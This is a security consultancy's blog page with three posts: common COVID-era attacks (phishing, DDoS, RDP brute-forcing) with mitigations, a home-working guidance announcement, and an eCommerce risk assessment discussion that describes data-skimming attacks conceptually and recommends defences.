Experiencing a Security Breach?
contact@prisminfosec.com +44 (0) 1242 652 100 +44 (0) 1242 652 100

Category: Blog Posts

Blog Post: Top 3 Common Networking Attacks

Posted on by Prism Infosec

Prism Infosec’s Senior Security Consultant, Aaron, reviews the “Top 3 Common Networking Attacks”​

During this unprecedented period when much of the world’s population is affected by lockdown measures and limited activities, cyber criminals have intensified their attacks. The state of fear and uncertainty has provided them with a new “business opportunity” and whilst most of us are spending more time on the Internet than ever before, several types of cyber-attacks have seen a drastic increase over the last few months.

1. Phishing Attacks

Amid this chaotic situation, many people are seeking out COVID-19 related information online, hoping to find reliable guidelines to stay safe and well. At the same time, hackers are taking advantage of this by ramping up “phishing” attacks that trick internet users into opening malicious files or links that report to provide COVID-19 information.

Cyber criminals do this by impersonating trusted organisations and sending out convincing emails containing attachments that are laden with malicious payloads. On opening, the attachments execute the code and allow an attacker unauthorised access to system resources and data, along with the capability to execute further attacks on other networked devices or resources.

In other phishing attacks, unsuspecting users are tricked into following links that lead the user to realistic login pages for trusted brands. On logging in, the valid usernames and passwords are captured and later used by criminals to conduct financial fraud and impersonation. 

Phishing attacks can be mitigated in several ways:

  • Implement anti-spoofing policy with malware and spam filters on mail servers to keep malicious emails from employees.
  • Implement email security protection measures such as SPF, DKIM and DMARC. This increases assurance around the validity of the sender associated with a particular domain and verifies whether it has been impersonated and prevents the emails from reaching inboxes.
  • Training employees on how to identify phishing exploits and the actions to take when they suspect phishing or have already opened an attachment or followed a link.

2. Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attack

At a time when Internet connections are required more than ever, a successful Denial of Service attack will have a more damaging impact than ever before.

A Distributed Denial-of-Service (DDoS) attack is when a collection of computers are infected with malicious code and controlled as a group (botnet). They are then targeted on another Internet service such as a web site, which is flooded with Internet traffic to deny its service to legitimate users. The outcome of a DDoS attack is operational disruption, which is achieved when systems and services are taken offline. Furthermore, attackers can disrupt organisations by threatening to shut down business services unless large sums of money are paid.

  • Utilising a Web Application Firewall (WAF)
  • Implementing rate limiting

It is crucial that organisations understand Denial of Service attacks and always be prepared to defend against it.

3. Remote Desktop Server Attack

Recently, many organisations have turned to Microsoft’s Remote Desktop Protocol (RDP) as a method of allowing remote workers access to corporate resources. The sharp increase in corporate services that need to be remotely accessible has significantly increased and with it the requirement to support remote working, however so has the number of reported RDP attacks.

RDP is a simple and cost-efficient method of facilitating remote working and access to corporate resources such as applications or desktops. However, the protocol is not sufficiently secure to be exposed to the internet. Without adequate security configurations in place, it can be easily compromised allowing an external attacker to gain a foothold into internal networks.

RDP attacks typically involve brute-forcing usernames and passwords, attempting all possible combinations until the correct one is found. Upon discovery of a correct combination, an attacker can gain full desktop access to a computer in the target network.

If your organisation must enable RDP, it is crucial that the following protection measures are in place:

  • Unique, long and random passwords are in use to protect the systems
  • Two factor authentication
  • Limiting the use of RDP to devices using a Corporate VPN
  • Ensure security options such as Network Level Authentication are enabled
  • Avoid connectivity of the RDP service to a corporate domain

If RDP access is not required, then it should be disabled and access to port 3389 should be blocked at the firewall.

Conclusion

In conclusion, cyber-crime is bound to increase for the rest of 2020 as cyber criminals are constantly engineering new methods to attack business operations. Hence, it is crucial that businesses stay ahead of cyber threats by maintaining good security practices, such as:

  • Regularly review network security – Audit security controls in place to ensure that network perimeters are well protected and unnecessary access are removed. Continue to monitor all systems and networks for unusual activities.
  • Maintain user education and awareness – Constantly remind employees of the importance of both physical and cyber security awareness. Develop home working policies and train employees to adhere to it.
  • Ensure Malware prevention is in place – Ensure that all anti-virus solutions are updated daily and anti-malware policies are in place.
  • Maintain secure configuration on all systems – Make sure that all servers and end user devices are patched up to date. Ensure that all remote working devices are subject to integrity checks before they are allowed access into corporate networks.
  • Secure remote access configurations – All remote solutions should utilise secure authentication, encryption technologies and have multifactor authentication enforced where possible.
  • Monitor user activities and privileges – Continue to monitor user activities for potential malicious activities and ensure that principle of least privilege is actively applied.
  • Incident response plan – Always be alert and prepared for potential cyber-attacks, ensure that an incident response plan is in place to deal with any emergencies.

Blog Post: Home Working Cyber Security Guidance

Posted on by Prism Infosec

During these uncertain times, Prism Infosec are doing their utmost to support the community with information security guidance and advice.

To start, Prism Infosec has published a blog post (longer read) and quick guide (key points) as essential updates for ensuring systems and data availability without compromising security.

A PDF of our full blog post can be downloaded from here.

For the quick guide, this can be downloaded here.

Blog Post: eCommerce Websites: Assessing the Risk

Posted on by Prism Infosec

The last year has seen a significant rise in the quantity and impact of attacks on eCommerce (eCom) websites which has cumulatively resulted in the exposure of millions of personal data and, in some cases, card holder data records.

In many cases, relatively simple attacks have been used to compromise eCom applications despite the best efforts of Information Security staff and standards bodies such as the PCI Security Standards Council (SSC). The potential impacts of data breaches include class action lawsuits, brand/reputational damage, fines from regulators such as the Information Commissioner’s Office (ICO) and card scheme fines from Mastercard and Visa.

Looking further into the recent breaches, there is no doubt that firms such as British Airways, Ticketmaster and Quora will have invested significantly in security and compliance. So where did it all go wrong? Are the standards not strong enough, or have the threats increased in sophistication? Why are breaches which affect millions of people so common?

What can organisations do to ensure that they minimise the risk of a successful eCom attack?

After investigating security across many eCom sites, it is apparent that gaps really do exist in many cases. One problem is that there are so many different ways to attack an eCom site, for example:

  • The underlying platform or environment hosting the eCom application;
  • Libraries, packages or dependencies used by the application;
  • The core web application functionality itself;
  • Network security;
  • Configuration settings across all systems and applications;
  • Remote access and management of the environment, including third parties; and
  • The Content Management System (CMS)

Many organisations only defend against a sub-set of these attack points or, in some cases, mistakenly believe that one or more contracted third parties is covering certain areas when this may not actually be the case.

Should an attacker gain unauthorised access to an underlying server involved in the delivery of a web site or the CMS application, then it can be straightforward to modify pages and code associated with critical pages such that information entered by a customer is duplicated to another web site under the control of the attacker. 

The issue associated with this particular attack is that the data (sensitive details such as personal data or credit card data) is not necessarily stored on the compromised server itself, but is nevertheless duplicated to a second malicious web site controlled by the attacker. The eCom site will appear to continue to process transactions ‘normally’ and so the attack can remain undetected for some time, harvesting many thousands of stolen records over a period of weeks or months.

This means that it is vitally important to ensure that access to the eCom servers and associated management systems are strongly protected, both from internal and external attackers. Additionally, detection of unexpected changes to core code and anomalous calls in client transactions are all measures that could be used to detect and prevent the success of such an attack.

Prevention

An online web application associated with the delivery of sales transactions can minimise the risk of a successful attack using effective eCom security management, such as:

  • Prevention of attacks with defence-in-depth (multi-layer security)
  • Detection and alerting of anomalies in eCom operation
  • Fast response to attacks to minimise the risk to the business

Regular testing and scanning of the eCom site is an essential basic, should be frequently conducted, with anomalies remediated as a priority – after all, attackers are testing and scanning all eCom sites across the Internet continuously.

A challenge mentality should be present in the teams managing the site’s infrastructure, code (whether bespoke, off the shelf eCom software / cloud service or a hybrid of the two) and cyber security. This is preferable to considering penetration testing and vulnerability scanning as “tick box exercises” – even issues rated as low risk should be reviewed and managed as part of an effective risk management regime. 

It is also recommended to conduct regular focused eCom risk assessments on new or existing sites, or when changing underlying application frameworks or adding new features such as voucher codes or customer product reviews.

An effective eCom risk assessment should cover:

  • Platform/technologies in use (hosting, network and software)
  • Effective management of any third parties
  • Resilience of eCom platform
  • Sensitive data stored, processed or transmitted, compliance obligations
  • eCom code and content development, testing and deployment
  • Logging/monitoring, testing and assurance

Relying on just baseline security practices such as patching and network security is quite clearly not the only requirement to ensure adequate protection of an eCom website, and many different threats and attacks need to be considered.

An eCom risk assessment, combined with regular testing and scanning, will ensure that the many risks of an eCom breach are understood, properly managed and mitigated as far as possible.